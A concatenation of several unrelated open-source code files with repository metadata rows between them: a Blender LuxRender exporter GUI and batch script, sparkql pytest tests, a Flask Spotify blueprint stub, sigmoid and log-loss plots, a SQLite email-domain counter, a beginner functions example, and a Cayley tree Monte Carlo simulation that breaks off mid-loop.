        if stop == 1:
            Draw.Exit()
            return
    scn = Scene.GetCurrent()
    if scn:
        # reset the material selection when the active object changes
        if scn.objects.active != activeObject:
            activeObject = scn.objects.active
            activemat = None
            Window.QRedrawAll()
    if (evt == Draw.MOUSEX) or (evt == Draw.MOUSEY): scrollbar.Mouse()
    if evt == Draw.WHEELUPMOUSE: scrollbar.scroll(-16)
    if evt == Draw.WHEELDOWNMOUSE: scrollbar.scroll(16)
    if evt == Draw.PAGEUPKEY: scrollbar.scroll(-50)
    if evt == Draw.PAGEDOWNKEY: scrollbar.scroll(50)
    # scroll to [T]op and [B]ottom
    if evt == Draw.TKEY:
        scrollbar.scroll(-scrollbar.position)
    if evt == Draw.BKEY:
        scrollbar.scroll(100000) # Some large number should be enough ?!
    # R key shortcut to launch render
    # E key shortcut to export current scene (not render)
    # P key shortcut to preview current material
    # These keys need time and process-complete locks
    if evt in [Draw.RKEY, Draw.EKEY, Draw.PKEY]:
        # ignore repeats while an action runs or within 5s of the last one
        if activeEvent == None and (sys.time() - lastEventTime) > 5:
            lastEventTime = sys.time()
            if evt == Draw.RKEY:
                activeEvent = 'RKEY'
                CBluxExport(luxProp(scn, "default", "true").get() == "true" or luxProp(scn, "pipe", "false").get() == "true", True)
                activeEvent = None
            if evt == Draw.EKEY:
                activeEvent = 'EKEY'
                CBluxExport(luxProp(scn, "default", "true").get() == "true" or luxProp(scn, "pipe", "false").get() == "true", False)
                activeEvent = None
            if evt == Draw.PKEY:
                activeEvent = 'PKEY'
                if activemat != None:
                    Preview_Update(activemat, '', True, 0, None, None, None)
                activeEvent = None
    # Switch GUI tabs with number keys
    if evt in key_tabs.keys():
        luxProp(scn, "page", 0).set(key_tabs[evt])
    luxDraw()
    Window.QRedrawAll()
    # Handle icon button events - note - radiance - this is a work in progress! :)
    # if evt == Draw.LEFTMOUSE and not val:
    #     size=BGL.Buffer(BGL.GL_FLOAT, 4)
    #     BGL.glGetFloatv(BGL.GL_SCISSOR_BOX, size)
    #     size= [int(s) for s in size]
    #     mx, my = Window.GetMouseCoords()
    #     mousex = mx - size[0]
    #     print("mousex = %i"%mousex)
    #     #if((mousex > 2) and (mousex < 25)):
    #     #    # Mouse clicked in left button bar
    #     if((mousex > 399) and (mousex < 418)):
    #         # Mouse clicked in right button bar
    #         mousey = my - size[1] - scrollbar.position
    #         print("mousey = %i"%mousey)
def luxButtonEvt(evt): # function that handles button events
    """Draw.Register button callback: dispatch preset and material actions.

    Handles saving/deleting scene presets, loading/saving/deleting
    material presets, converting blender materials and LBM file dialogs.
    """
    global usedproperties, usedpropertiesfilterobj
    if evt == evtLuxGui:
        Draw.Redraw()
    if evt == evtSavePreset:
        scn = Scene.GetCurrent()
        if scn:
            name = Draw.PupStrInput("preset name: ", "")
            if name != "":
                # capture the scene render properties via the usedproperties hook
                usedproperties = {}
                usedpropertiesfilterobj = None
                luxSurfaceIntegrator(scn)
                luxRenderer(scn)
                luxSampler(scn)
                luxPixelFilter(scn)
                # luxFilm(scn)
                # luxEnvironment(scn)
                saveScenePreset(name, usedproperties.copy())
                luxProp(scn, "preset", "").set(name)
                Draw.Redraw()
    if evt == evtDeletePreset:
        presets = getScenePresets().keys()
        presets.sort()
        presetsstr = "delete preset: %t"
        for i, v in enumerate(presets): presetsstr += "|%s %%x%d"%(v, i)
        r = Draw.PupMenu(presetsstr, 20)
        if r >= 0:
            # saving None removes the preset
            saveScenePreset(presets[r], None)
            Draw.Redraw()
    if evt == evtLoadMaterial:
        if activemat:
            mats = getMaterialPresets()
            matskeys = mats.keys()
            matskeys.sort()
            matsstr = "load preset: %t"
            for i, v in enumerate(matskeys): matsstr += "|%s %%x%d"%(v, i)
            r = Draw.PupMenu(matsstr, 20)
            if r >= 0:
                name = matskeys[r]
                try:
                    # for k,v in mats[name].items(): activemat.properties['pbrtblend'][k] = v
                    for k,v in mats[name].items(): luxProp(activemat, k, None).set(v)
                except: pass
                Draw.Redraw()
    if evt == evtSaveMaterial:
        if activemat:
            name = Draw.PupStrInput("preset name: ", "")
            if name != "":
                usedproperties = {}
                usedpropertiesfilterobj = activemat
                luxMaterial(activemat)
                saveMaterialPreset(name, usedproperties.copy())
                Draw.Redraw()
    if evt == evtDeleteMaterial:
        matskeys = getMaterialPresets().keys()
        matskeys.sort()
        matsstr = "delete preset: %t"
        for i, v in enumerate(matskeys): matsstr += "|%s %%x%d"%(v, i)
        r = Draw.PupMenu(matsstr, 20)
        if r >= 0:
            saveMaterialPreset(matskeys[r], None)
            Draw.Redraw()
    if evt == evtConvertMaterial:
        if activemat: convertMaterial(activemat)
        Draw.Redraw()
    if evt == evtLoadMaterial2:
        if activemat:
            scn = Scene.GetCurrent()
            Window.FileSelector(lambda fn:loadMatTex(activemat, fn), "load material", luxProp(scn, "lux", "").get()+os.sep+".lbm")
    if evt == evtSaveMaterial2:
        if activemat:
            scn = Scene.GetCurrent()
            # NOTE(review): calls saveMaterial, not saveMatTex — confirm that
            # helper exists elsewhere in the file
            Window.FileSelector(lambda fn:saveMaterial(activemat, fn), "save material", luxProp(scn, "lux", "").get()+os.sep+".lbm")
def setFocus(target):
    """Set the camera's depth-of-field distance to a reference point.

    `target` selects the reference: "S" = first selected object,
    "C" = 3D cursor, anything else = object of that name. The DoF
    distance is the camera-direction component of the camera->target
    vector.
    """
    currentscene = Scene.GetCurrent()
    camObj = currentscene.objects.camera # currentscene.getCurrentCamera()
    if target == "S":
        try:
            refLoc = (Object.GetSelected()[0]).getLocation()
        except:
            # NOTE(review): refLoc stays unbound here, so the code below
            # raises NameError when nothing is selected
            print("select an object to focus\n")
    elif target == "C":
        refLoc = Window.GetCursorPos()
    else:
        refLoc = (Object.Get(target)).getLocation()
    dist = Mathutils.Vector(refLoc) - Mathutils.Vector(camObj.getLocation())
    camDir = camObj.getMatrix()[2]*(-1.0)
    # project dist onto the (negated) camera view axis
    camObj.getData(mesh=1).dofDist = (camDir[0]*dist[0]+camDir[1]*dist[1]+camDir[2]*dist[2])/camDir.length # data
# Parse command line arguments for batch mode rendering if supplied
try:
    batchindex = osys.argv.index('--batch')
    pyargs = osys.argv[osys.argv.index('--batch')+1:]
except: pyargs = []

if (pyargs != []) and (batchindex != 0):
    # ---- BATCH mode: drive the exporter entirely from command-line options ----
    print("\n\Pbrt v2.0 - BATCH mode\n")  # NOTE(review): '\P' looks like a typo for '\nP'
    LuxIsGUI = False
    scene = Scene.GetCurrent()
    context = scene.getRenderingContext()
    luxpath = ""
    import getopt
    o, a = getopt.getopt(pyargs, 's:e:o:t:l:',["scale=","haltspp=","run=", "lbm=", "lbt="])
    opts = {}
    for k,v in o:
        opts[k] = v
    if (opts.has_key('--run')) and (opts['--run'] == 'false'):
        print("Run: false")
        luxProp(scene, "run", "true").set("false")
    else:
        luxProp(scene, "run", "true").set("true")
    if opts.has_key('--scale'):
        print("Zoom: %s" %opts['--scale'])
        luxProp(scene, "film.scale", "100 %").set(opts['--scale'])
    if opts.has_key('--haltspp'):
        print("haltspp: %s" %opts['--haltspp'])
        luxProp(scene, "haltspp", 0).set(int(opts['--haltspp']))
    # -s / -e / -l / -o / -t are mandatory; missing ones abort with exit code 1
    if opts.has_key('-s'):
        print("Start frame: %s" %opts['-s'])
        context.startFrame(int(opts['-s']))
    else:
        print("Error: Start frame not supplied (-s)"); osys.exit(1)
    if opts.has_key('-e'):
        print("End frame: %s" %opts['-e'])
        context.endFrame(int(opts['-e']))
    else:
        print("Error: End frame not supplied (-e)"); osys.exit(1)
    if opts.has_key('-l'):
        print("Path to pbrt binary: %s" %opts['-l'])
        luxbatchconsolemode = luxProp(scene, "luxbatchc", "false")
        luxbatchconsolemode.set("true")
        luxpathprop = luxProp(scene, "lux", "")
        luxpathprop.set(opts['-l'])
    else:
        print("Error: path to pbrt binary not supplied (-l)"); osys.exit(1)
    if opts.has_key('-o'):
        print("Image output path: %s" %opts['-o'])
        luxProp(scene, "overrideoutputpath", "").set(opts['-o'])
    else:
        print("Error: image output path not supplied (-o)"); osys.exit(1)
    if opts.has_key('-t'):
        print("Temporary export path: %s" %opts['-t'])
        luxProp(scene, "datadir", "").set(opts['-t'])
    else:
        print("Error: Temporary export path not supplied (-t)"); osys.exit(1)
    # optional material / texture presets applied to the material named "Material"
    if opts.has_key('--lbm'):
        print("Load material: %s" %opts['--lbm'])
        mat = Material.Get("Material")
        if mat: loadMatTex(mat, opts['--lbm'])
        else:
            print("Error: No material with name \"Material\" found (--lbm)"); osys.exit(1)
    if opts.has_key('--lbt'):
        print("Load material: %s" %opts['--lbt'])
        mat = Material.Get("Material")
        if mat: loadMatTex(mat, opts['--lbt'], ':Kd')
        else:
            print("Error: No material with name \"Material\" found (--lbt)"); osys.exit(1)
    # CBluxAnimExport(True, True)
    CBluxAnimExport(True, True, False) # as by zukazuka (http://www.luxrender.net/forum/viewtopic.php?f=11&t=1288)
    osys.exit(0)
else:
    # ---- UI mode: register the GUI callbacks and validate the renderer path ----
    print("\n\nLuxBlend v0.6 - UI mode\n")
    from Blender.Window import DrawProgressBar
    LuxIsGUI = True
    Draw.Register(luxDraw, luxEvent, luxButtonEvt) # init GUI
    luxpathprop = luxProp(Scene.GetCurrent(), "lux", "")
    luxpath = luxpathprop.get()
    luxrun = luxProp(Scene.GetCurrent(), "run", True).get()
    checkluxpath = luxProp(Scene.GetCurrent(), "checkluxpath", True).get()
    if checkluxpath and luxrun:
        if (luxpath is None) or (sys.exists(luxpath)<=0):
            # luxpath not valid, so delete entry from .blend scene file
            luxpathprop.delete()
            # and re-get luxpath, so we get the path from default-settings
            luxpath = luxpathprop.get()
            # fall back to the LUXRENDER_ROOT environment variable
            LUXRENDER_ROOT = os.getenv('LUXRENDER_ROOT')
            if LUXRENDER_ROOT is not None:
                LUXRENDER_ROOT = LUXRENDER_ROOT + os.sep
                luxpathprop.set(LUXRENDER_ROOT)
                luxpath = LUXRENDER_ROOT
                if sys.exists(luxpath)>0:
                    print('LuxRender path set from LUXRENDER_ROOT environment variable')
                    saveluxdefaults()
        # still invalid after defaults/env fallback -> ask the user
        if (luxpath is None) or (sys.exists(luxpath)<=0):
            print("WARNING: LuxPath \"%s\" is not valid\n"%(luxpath))
            scn = Scene.GetCurrent()
            if scn:
                r = Draw.PupMenu("Installation: Set path to the pbrt software?%t|Yes%x1|No%x0|Never%x2")
                if r == 1:
                    Window.FileSelector(lambda s:luxProp(scn, "pbrt", "").set(Blender.sys.dirname(s)+os.sep), "Select file in Lux path")
                    saveluxdefaults()
                if r == 2:
                    newluxdefaults["checkluxpath"] = False
                    saveluxdefaults()
    else :
        print("Lux path check disabled\n")
| 61.953737
| 9,419
| 0.557422
|
b89948c81c616a7db3eaafcf5c2efcfe025082e4
| 6,521
|
py
|
Python
|
tests/unit/test_fields/test_struct_make_dict.py
|
radeklat/sparkql
|
57d55c7599460f2e7e5957c037d7c25cedb92647
|
[
"MIT"
] | 6
|
2020-02-12T14:01:08.000Z
|
2020-05-29T05:35:09.000Z
|
tests/unit/test_fields/test_struct_make_dict.py
|
radeklat/sparkql
|
57d55c7599460f2e7e5957c037d7c25cedb92647
|
[
"MIT"
] | 31
|
2020-02-09T18:52:52.000Z
|
2020-05-15T16:03:32.000Z
|
tests/unit/test_fields/test_struct_make_dict.py
|
radeklat/sparkql
|
57d55c7599460f2e7e5957c037d7c25cedb92647
|
[
"MIT"
] | 1
|
2020-04-03T19:23:08.000Z
|
2020-04-03T19:23:08.000Z
|
"""
Suite of tests for Struct make_dict.
Partner to `test_struct.py`.
"""
import re
from collections import OrderedDict
from typing import Mapping, Any
import pytest
from sparkql.exceptions import StructInstantiationArgumentsError, StructInstantiationArgumentTypeError
from sparkql import Struct, String, Float, Array
from tests.utilities import does_not_raise
def assert_ordered_dicts_equal(dict_a: Mapping[Any, Any], dict_b: Mapping[Any, Any]):
    """Assert that two mappings are equal, including their key order.

    Plain dict equality ignores ordering, so a second comparison is made
    through OrderedDict, whose equality is order-sensitive.
    """
    assert dict_a == dict_b
    ordered_a, ordered_b = OrderedDict(dict_a), OrderedDict(dict_b)
    assert ordered_a == ordered_b
class TestStructMakeDict:
    """Unit tests for `Struct.make_dict`: argument binding, field ordering,
    null-defaulting, and the exact wording of its argument errors."""

    @staticmethod
    def should_take_keyword_arg_and_resolve_property_name_to_explicit_name():
        # given
        class AnObject(Struct):
            text = String(name="explicit_text_field_name")

        # when
        dic = AnObject.make_dict(text="text_value")

        # then: keyword uses the attribute name, output uses the explicit name
        assert_ordered_dicts_equal(dic, {"explicit_text_field_name": "text_value"})

    @staticmethod
    def should_take_positional_arg():
        # given
        class AnObject(Struct):
            text = String()

        # when
        dic = AnObject.make_dict("text_value")

        # then
        assert_ordered_dicts_equal(dic, {"text": "text_value"})

    @staticmethod
    def should_obey_schema_ordering():
        # given
        class AnObject(Struct):
            text_field = String(name="explicit_text_name")
            numeric_field = Float(name="explicit_numeric_name")

        # when: keyword order deliberately reversed w.r.t. the schema
        dic = AnObject.make_dict(numeric_field=7.0, text_field="text_value")

        # then: output order follows the schema, not the call
        assert_ordered_dicts_equal(dic, {"explicit_text_name": "text_value", "explicit_numeric_name": 7})

    @staticmethod
    def should_fail_when_defaulting_a_non_nullable_to_null():
        # given: numeric is omitted and may not default to null
        args = ["text value"]
        kwargs = {}

        class AnObject(Struct):
            text = String(name="alt_name")
            numeric = Float(nullable=False)

        # when, then
        with pytest.raises(
            StructInstantiationArgumentTypeError,
            match=re.escape("Non-nullable field cannot have None value (field name = 'numeric')"),
        ):
            AnObject.make_dict(*args, **kwargs)

    @staticmethod
    def should_default_a_nullable_to_null():
        # given: the nullable text field is omitted
        args = []
        kwargs = {"numeric": 3.4}

        class AnObject(Struct):
            text = String(name="alt_name")
            numeric = Float(nullable=False)

        # when
        dic = AnObject.make_dict(*args, **kwargs)

        # then: omitted nullable field defaults to None
        assert_ordered_dicts_equal(dic, {"alt_name": None, "numeric": 3.4})

    @staticmethod
    @pytest.mark.parametrize(
        "args,kwargs,expected_error_message",
        [
            pytest.param(
                ["value"],
                {"text": "value", "numeric": 7.0},
                "There were struct properties with multiple values. Repeated properties: text \n"
                "Properties required by this struct are: text, numeric",
                id="surplus-mixed-args",
            ),
            pytest.param(
                ["value", 7.0, 3.0],
                {},
                "There were 1 surplus positional arguments. Values for surplus args: 3.0 \n"
                "Properties required by this struct are: text, numeric",
                id="surplus-positional-args",
            ),
            pytest.param(
                [],
                {"text": "value", "numeric": 7.0, "mystery_argument": "value"},
                "There were surplus keyword arguments: mystery_argument \n"
                "Properties required by this struct are: text, numeric",
                id="surplus-keyword-args",
            ),
            pytest.param(
                [],
                {"mystery_argument": "value"},
                "There were surplus keyword arguments: mystery_argument \n"
                "Properties required by this struct are: text, numeric\n"
                "Omitted struct properties were defaulted to null: text, numeric",
                id="all-fields-defaulted-is-ok-but-surplus-keyword-args-is-bad",
            ),
        ],
    )
    def should_raise_on_encountering_invalid_args(args, kwargs, expected_error_message):
        # given
        class AnObject(Struct):
            text = String(name="alt_name")
            numeric = Float()

        # when, then: error message must match exactly (re.escape)
        with pytest.raises(StructInstantiationArgumentsError, match=re.escape(expected_error_message)):
            AnObject.make_dict(*args, **kwargs)

    @staticmethod
    @pytest.mark.parametrize(
        "args,kwargs,expected_error_message",
        [
            pytest.param(
                [], {"text": None, "numeric": 7}, "Non-nullable field cannot have None value", id="none-in-nullable"
            )
        ],
    )
    def should_raise_on_encountering_invalid_arg_type(args, kwargs, expected_error_message):
        # given
        class AnObject(Struct):
            text = String(nullable=False)
            numeric = Float()

        # when, then
        with pytest.raises(StructInstantiationArgumentTypeError, match=expected_error_message):
            AnObject.make_dict(*args, **kwargs)

    @staticmethod
    @pytest.mark.parametrize(
        "kwargs, expected_error",
        [
            pytest.param({"text_sequence": None}, does_not_raise(), id="allow-none-in-nullable"),
            pytest.param(
                {"text_sequence": "this is a string value"},
                pytest.raises(
                    StructInstantiationArgumentTypeError,
                    match=re.escape(
                        "Value for an array must not be a string. Found value 'this is a string value'. "
                        "Did you mean to use a list of strings?"
                    ),
                ),
                id="reject-non-sequence-string-in-array",
            ),
            pytest.param(
                {"float_sequence": 5.5},
                pytest.raises(
                    StructInstantiationArgumentTypeError,
                    match=re.escape("Value for an array must be a sequence, not 'float'"),
                ),
                id="reject-non-sequence-float-in-array",
            ),
        ],
    )
    def test_arrays_should_be_handled_correctly(kwargs, expected_error):
        # Exercises both array fields: null is accepted, scalars are rejected.
        # given
        class AnObject(Struct):
            text_sequence = Array(String())
            float_sequence = Array(Float())

        # when, then
        with expected_error:
            AnObject.make_dict(**kwargs)
| 33.441026
| 116
| 0.579666
|
df5af76319cef47af97bace14d11ec330e499456
| 1,025
|
py
|
Python
|
app/routes/spotify_routes.py
|
Build-Week-Spotify-Song-Suggestor/DS
|
03070f5f0d2f19472b87a401879429f650dc88ec
|
[
"MIT"
] | null | null | null |
app/routes/spotify_routes.py
|
Build-Week-Spotify-Song-Suggestor/DS
|
03070f5f0d2f19472b87a401879429f650dc88ec
|
[
"MIT"
] | null | null | null |
app/routes/spotify_routes.py
|
Build-Week-Spotify-Song-Suggestor/DS
|
03070f5f0d2f19472b87a401879429f650dc88ec
|
[
"MIT"
] | null | null | null |
# app/routes/spotify_routes.py
from flask import Blueprint, jsonify, request
from app.services.spotify_services import spotify_api_client
from app.model.models import db, Songs
# Flask blueprint grouping the Spotify-related endpoints; the enclosing app
# registers it elsewhere (no routes are attached in this module yet).
spotify_routes = Blueprint('spotify_routes',__name__)
# Todo for today: add route to add new track to database
# @app.route('/add-track')
# def refresh():
#     for n_track in tracks:
#         track = api.track(n_track)
#         result = {'artist':track['artists'][0]['name'],'name': track['name'],
#          'track_id': track['id'], 'popularity':track['popularity']}
#         feat = api.audio_features(n_track)
#         addon = {'time_signature': feat[0]['time_signature'], 'tempo': feat[0]['tempo'],
#        'instrumentalness': feat[0]['instrumentalness'], 'valence': feat[0]['valence'], 'energy': feat[0]['energy'],
#         'danceability': feat[0]['danceability'], 'loudness': feat[0]['loudness'], 'key': feat[0]['key'], 'analysis_url': feat[0]['analysis_url']}
#         result.update(addon)
# This module is import-only (a blueprint); nothing runs when executed directly.
if __name__ == "__main__":
    pass
| 36.607143
| 147
| 0.649756
|
31b830e4147b43f853da5f17d0d40fe0d3a4a595
| 833
|
py
|
Python
|
Chapter06/2logistic_function.py
|
karim7262/Python-Machine-Learning-By-Example
|
1bd2690225c93f637eabc5c78574714a22b4068a
|
[
"MIT"
] | 106
|
2017-06-20T07:06:26.000Z
|
2022-01-28T20:17:57.000Z
|
Chapter06/2logistic_function.py
|
karim7262/Python-Machine-Learning-By-Example
|
1bd2690225c93f637eabc5c78574714a22b4068a
|
[
"MIT"
] | 2
|
2017-11-20T03:36:46.000Z
|
2019-03-08T07:47:02.000Z
|
Chapter06/2logistic_function.py
|
karim7262/Python-Machine-Learning-By-Example
|
1bd2690225c93f637eabc5c78574714a22b4068a
|
[
"MIT"
] | 83
|
2017-07-02T03:09:38.000Z
|
2022-03-07T06:45:04.000Z
|
import numpy as np
def sigmoid(input):
    """Logistic (sigmoid) function mapping any real input into (0, 1).

    Accepts a scalar or a numpy array. Computed via exp(-|z|), whose
    argument is always <= 0, so the exponential never overflows for
    large-magnitude inputs (the naive 1/(1+exp(-z)) overflows for very
    negative z).
    """
    z = np.asarray(input, dtype=float)
    e = np.exp(-np.abs(z))  # argument <= 0: cannot overflow
    result = np.where(z >= 0, 1.0 / (1.0 + e), e / (1.0 + e))
    # Preserve scalar-in -> scalar-out behaviour of the original formula.
    return result.item() if result.ndim == 0 else result
import matplotlib.pyplot as plt
# Plot the sigmoid curve over [-8, 8] with reference lines at y = 0, 0.5, 1.
z = np.linspace(-8, 8, 1000)
y = sigmoid(z)
plt.plot(z, y)
plt.axhline(y=0, ls='dotted', color='k')
plt.axhline(y=0.5, ls='dotted', color='k')
plt.axhline(y=1, ls='dotted', color='k')
plt.yticks([0.0, 0.25, 0.5, 0.75, 1.0])
plt.xlabel('z')
plt.ylabel('y(z)')
plt.show()
# plot sample cost vs y_hat (prediction), for y (truth) = 1
# Log-loss term -log(y_hat): cost grows without bound as y_hat -> 0.
y_hat = np.linspace(0, 1, 1000)
cost = -np.log(y_hat)
plt.plot(y_hat, cost)
plt.xlabel('Prediction')
plt.ylabel('Cost')
plt.xlim(0, 1)
plt.ylim(0, 7)
plt.show()
# plot sample cost vs y_hat (prediction), for y (truth) = 0
# Mirror-image term -log(1 - y_hat): cost explodes as y_hat -> 1.
y_hat = np.linspace(0, 1, 1000)
cost = -np.log(1 - y_hat)
plt.plot(y_hat, cost)
plt.xlabel('Prediction')
plt.ylabel('Cost')
plt.xlim(0, 1)
plt.ylim(0, 7)
plt.show()
| 20.317073
| 59
| 0.645858
|
bac30c6b179858b0c577cadcdc234be11a0ce58d
| 1,720
|
py
|
Python
|
projects/python-4-everybody-examples/sqlite-email-addresses/emaildb.py
|
fred-snyder/notes-on-python
|
1837a8999ea0d736ff3804417524b8d8cb1955e6
|
[
"MIT"
] | 1
|
2022-03-15T22:03:45.000Z
|
2022-03-15T22:03:45.000Z
|
projects/python-4-everybody-examples/sqlite-email-addresses/emaildb.py
|
fred-snyder/notes-on-python
|
1837a8999ea0d736ff3804417524b8d8cb1955e6
|
[
"MIT"
] | null | null | null |
projects/python-4-everybody-examples/sqlite-email-addresses/emaildb.py
|
fred-snyder/notes-on-python
|
1837a8999ea0d736ff3804417524b8d8cb1955e6
|
[
"MIT"
] | null | null | null |
import sqlite3
# make connection to sqlite
conn = sqlite3.connect('emaildb.sqlite')
# a cursor allows Python-code to execute SQL commands in a database session
cur = conn.cursor()
# make sure we start with a clean database
cur.execute('DROP TABLE IF EXISTS Counts')
# create a new empty table
cur.execute('''
CREATE TABLE Counts (org TEXT, count INTEGER)''')
# open the data file (default to mbox.txt on empty input)
fname = input('Enter file name: ')
if (len(fname) < 1): fname = 'mbox.txt'
# fix: use a context manager so the file handle is always closed --
# the original called open() and never closed the file
with open(fname) as fh:
    # loop over lines in the data
    for line in fh:
        # only work on lines that start with "From: "
        if not line.startswith('From: '): continue
        # extract the domain part of the sender's email address
        pieces = line.split()
        email = pieces[1]
        email_domain = email.split('@')
        email_domain = email_domain[1]
        # query database for the count of that domain (parameterized query)
        cur.execute('SELECT count FROM Counts WHERE org = ? ', (email_domain,))
        # get the result of that query
        row = cur.fetchone()
        if row is None:  # first sighting of this domain: start its count at 1
            cur.execute('''INSERT INTO Counts (org, count)
                    VALUES (?, 1)''', (email_domain,))
        else:  # otherwise increment the existing count
            cur.execute('UPDATE Counts SET count = count + 1 WHERE org = ?',
                        (email_domain,))
# commit the changes to the database
conn.commit()
# https://www.sqlite.org/lang_select.html
sqlstr = 'SELECT org, count FROM Counts ORDER BY count DESC LIMIT 10'
# execute the query in the string above and print the ten most common domains
for row in cur.execute(sqlstr):
    print(str(row[0]), row[1])
# close the cursor and the database connection
cur.close()
conn.close()  # fix: the original never closed the connection
| 29.152542
| 75
| 0.668023
|
c709386c1d32215a85c3c3018e9969e07747c654
| 176
|
py
|
Python
|
Lesson 5/01_functions.py
|
hamburgcodingschool/L2C-Python-1804
|
3420691aaee81fb88b2e8e21763014bc91d2ed96
|
[
"MIT"
] | null | null | null |
Lesson 5/01_functions.py
|
hamburgcodingschool/L2C-Python-1804
|
3420691aaee81fb88b2e8e21763014bc91d2ed96
|
[
"MIT"
] | null | null | null |
Lesson 5/01_functions.py
|
hamburgcodingschool/L2C-Python-1804
|
3420691aaee81fb88b2e8e21763014bc91d2ed96
|
[
"MIT"
] | null | null | null |
def something():
    """Print three demo messages, one per line."""
    for message in ("something", "something else", "something other"):
        print(message)
# Demo: a loop inside a (always-true) conditional, then a function call.
if True:
    # range(1, 10) yields 1 through 9 inclusive.
    for n in range(1, 10):
        print(n)
something()
| 16
| 30
| 0.556818
|
6f5ae1abe96d336522cbe36a5b0f1aed3ef9cbf9
| 17,610
|
py
|
Python
|
research/volume.py
|
Billy-The-Squid/Cayley
|
8e1884358c10e410c3b236d2be700726e84c6df2
|
[
"MIT"
] | null | null | null |
research/volume.py
|
Billy-The-Squid/Cayley
|
8e1884358c10e410c3b236d2be700726e84c6df2
|
[
"MIT"
] | null | null | null |
research/volume.py
|
Billy-The-Squid/Cayley
|
8e1884358c10e410c3b236d2be700726e84c6df2
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""
Authors: Justin Pusztay, Sho Gibbs, Will Hanstedt
Filename: volume.py
Project: Research for Irina Mazilu, Ph.D.
Adapted from cayleymain.py module by Justin Pusztay et al.
Runs Cayley tree simulations in bulk according to the methods laid out in
montecarlo.py.
"""
import Cayley as cy
import Cayley.graphics as cg
import Cayley.research as cr
import xlsxwriter as xl
import time
from math import sqrt
from Cayley.research import total_nodes
# Simulation settings loaded from change_me.py via the research helpers.
timesteps = cr.variable('timesteps', int)  # Monte Carlo steps per trial
node_list = cr.variable('node_list', list, int)  # node pairs to correlate (used as node_list[n][0], node_list[n][1])
initial_state = cr.variable('initial_state',str)  # one of "empty" | "random" | "zero" (see simulate())
temp_d = cr.variable('temp_d', dict, float)  # per-generation temperatures for the 'TM' method
def simulate(method, generations, links, alpha, beta, gamma, mu, r1, r2,
             trials,k,J):
    """Run `trials` Monte Carlo simulations on a Cayley tree; write one .xlsx.

    method -- 'NN' (nearest neighbors), 'TL' (total lattice density),
              'EI' (empty interval) or 'TM' (temperature dynamics).
    The rate parameters (alpha..r2) and k/J belong to the chosen method;
    callers pass 0 (or 1 for k/J) for the unused ones.
    The workbook name encodes the method, tree size and parameter tags.
    """
    generations = generations + 1 ## #
    network = cy.CayleyTree(generations, links)
    monte = cy.MonteCarlo(network, alpha, beta, gamma, mu, r1, r2)
    run_time = time.time()
    endcol = xl.utility.xl_col_to_name(timesteps+1)
    # Two-decimal parameter tags used to build the workbook file name.
    a_tag = "%.2f" % alpha
    b_tag = "%.2f" % beta
    g_tag = "%.2f" % gamma
    m_tag = "%.2f" % mu
    r1_tag = "%.2f" % r1
    r2_tag = "%.2f" % r2
    if method == 'NN':
        name = ("NN%dGen_%dLin_%sα_%sβ_%sγ.xlsx" % (generations-1, links,
                                                    a_tag, b_tag, g_tag))
        tags = a_tag+'-'+b_tag+'-'+g_tag
    elif method == 'TL':
        name = ("TL%dGen_%dLin_%sμ_%sγ.xlsx" % (generations-1, links,
                                                m_tag, g_tag))
        tags = m_tag+'-'+g_tag
    elif method == 'EI':
        name = ("EI%dGen_%dLin_%sr1_%sr2_%sγ.xlsx" % (generations-1, links,
                                                      r1_tag, r2_tag, g_tag))
        tags = r1_tag+'-'+r2_tag+'-'+g_tag
    elif method == 'TM':
        # One tag per configured temperature, joined with underscores.
        tag_list = ()
        for s in range(len(temp_d)):
            tag_list += ("%.2f"%temp_d[s],)
        tags = ("%s_"*(len(temp_d)-1)+"%s") %tag_list
        name = ("TM%dGen_%dLin_"%(generations-1,links)+tags+".xlsx")
    else: raise ValueError("Method not recognized")
    print("\n#### RUNNING SIMULATION %s ####\n"%(name))
    workbook = xl.Workbook(name)
    #JKP: This all can be incorporated with new node feature ability
    density_list = dict() #[trial][timestep] stores overall densities
    state_collect = dict() #[trial] stores final state dictionaries
    dens_collect = dict() #[trial][generation] stores generational densities
    node_d = dict() #[trial#][pair index][node index][timestep] stores node values
    overtime = workbook.add_worksheet("Over_Time")
    overall = workbook.add_worksheet("Overall")
    for m in range(trials):
        density_list[m] = [0]*(timesteps+2)
    for m in range(trials):
        dens_collect[m] = [0]*(generations)
    for i in range(trials):
        # Reset the walker and seed the initial configuration per method.
        monte.clear()
        if method == 'TM': monte.randomSpins()
        else:
            if initial_state == "empty": monte.emptyDictionary()
            elif initial_state == "random": monte.randomDictionary()
            elif initial_state == "zero": monte.zeroDictionary()
        if method == 'TM':
            # Assign each generation its temperature, cycling through temp_d.
            iterate = len(temp_d)
            for d in range (generations+1):
                temp = temp_d[d%iterate]
                network.addMultipleNodes(network.nodesPerGen(d),temperature=temp)
        for t in range(timesteps+1):
            if method == 'NN':
                monte.simulateNN()
            elif method == 'EI':
                monte.simulateEI()
            elif method == 'TL':
                monte.simulateTL(t)
            elif method == 'TM':
                monte.simulateTemp(k,J)
        ### FOR RECORDING DATA ###
        state_collect[i] = monte.simData(monte.getTimesteps()-1) #JKP updated
        node_d[i] = list()
        for n in range(len(node_list)):
            node_d[i].append([])
            for f in range(len(node_list[n])):
                node_d[i][n].append([])
                for t in range(timesteps+1):
                    if method == 'TM':
                        node_d[i][n][f].append((monte.simData(t)[node_list[n][f]]))
                    else:
                        # Map occupation {0,1} onto spin-like values {-1,+1}.
                        node_d[i][n][f].append(2*(monte.simData(t)[node_list[n][f]])-1)
        for y in range(monte.getTimesteps()): #JKP: Follows new updates
            sum_t = 0 # Sum of relevant nodes at one timestep
            for x in range(total_nodes[generations-1][links]): ## # gives adjusted, can't use len(monte.network)
                sum_t += monte.simData(y)[x] #JKP: Follows new updates
            dens_t = sum_t/total_nodes[generations-1][links] ## # Density at one timestep
            density_list[i][y] = dens_t
        if trials <= 10: # Trial-by-trial is best for small sets
            worksheet = workbook.add_worksheet("Data trial %d" % (i+1))
            worksheet.write(0,0,"Timestep")
            for x in range(total_nodes[generations-1][links]):## #
                worksheet.write(x+1,0,"Node "+str(x))
            for y in range(monte.getTimesteps()): #JKP: Follows new updates
                worksheet.write(0,y+1,str(y))
            for y in range(monte.getTimesteps()): #JKP: Follows new updates
                for x in range(total_nodes[generations-1][links]):
                    worksheet.write(x+1,y+1,monte.simData(y)[x]) #JKP: Follows new updates
            worksheet2 = workbook.add_worksheet("Density trial %d" % (i+1))
            worksheet2.write(0,0,"Timestep")
            worksheet2.write(network.generations+1,0,"Density") ## # #JKP: update
            for x in range(network.generations): ## # #JKP: follows update
